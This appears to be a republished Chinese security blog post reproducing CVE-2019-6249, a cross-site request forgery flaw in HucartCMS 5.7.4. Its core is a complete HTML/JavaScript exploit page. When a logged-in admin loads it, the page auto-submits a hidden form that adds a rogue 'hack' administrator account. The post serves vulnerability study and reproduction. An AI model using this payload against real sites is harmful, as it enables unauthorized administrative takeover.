前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >CVE-2019-6249 HucartCMS CSRF漏洞复现

CVE-2019-6249 HucartCMS CSRF漏洞复现

作者头像
墙角睡大觉
发布2019-09-24 17:31:08
1.2K0
发布2019-09-24 17:31:08
举报

近日,Hucart cms v5.7.4版本存在一个CSRF漏洞,当管理员登陆后访问CSRF测试页面,可导致增加一个名为hack的管理员账号。漏洞编号是CVE-2019-6249.

从网上下载源码本地安装即可。本地创建一个html文件,保存如下exp代码:

代码语言:javascript
复制
<html><body>
<script type="text/javascript">
function post(url,fields)
{
var p = document.createElement("form");
p.action = url;
p.innerHTML = fields;
p.target = "_self";
p.method = "post";
document.body.appendChild(p);
p.submit();
}
function csrf_hack()
{
var fields;

fields += "<input type='hidden' name='adm_user' value='hack' />";
fields += "<input type='hidden' name='adm_email' value='admin@hack.com' />";  
fields += "<input type='hidden' name='adm_mobile' value='12345678901' />";  
fields += "<input type='hidden' name='adm_pwd' value='hack123' />";  
fields += "<input type='hidden' name='re_adm_pwd' value='hack123' />";  
fields += "<input type='hidden' name='adm_enabled' value='1' />";  
fields += "<input type='hidden' name='act_type' value='add' />";  
fields += "<input type='hidden' name='adm_id' value='' />";  

var url = "http://localhost/hucart/adminsys/index.php?load=admins&act=edit_info&act_type=add";
post(url,fields);
}
window.onload = function() { csrf_hack();}
</script>
</body></html>

首先以管理员身份登录站点后台,然后访exp代码页面,即可添加一个hack/hack123账户信息,访问即可:

查看数据库后台的hc_admins表能够发现账户信息已经被添加!

源码下载:

http://down.chinaz.com/soft/35067.htm#down

参考信息:

https://www.exploit-db.com/exploits/46149

https://github.com/NMTech0x90/CVE-2019-6249_Hucart-cms

本文参与 腾讯云自媒体分享计划,分享自微信公众号。
原始发表:2019-03-20,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 安全漏洞环境学习 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体分享计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档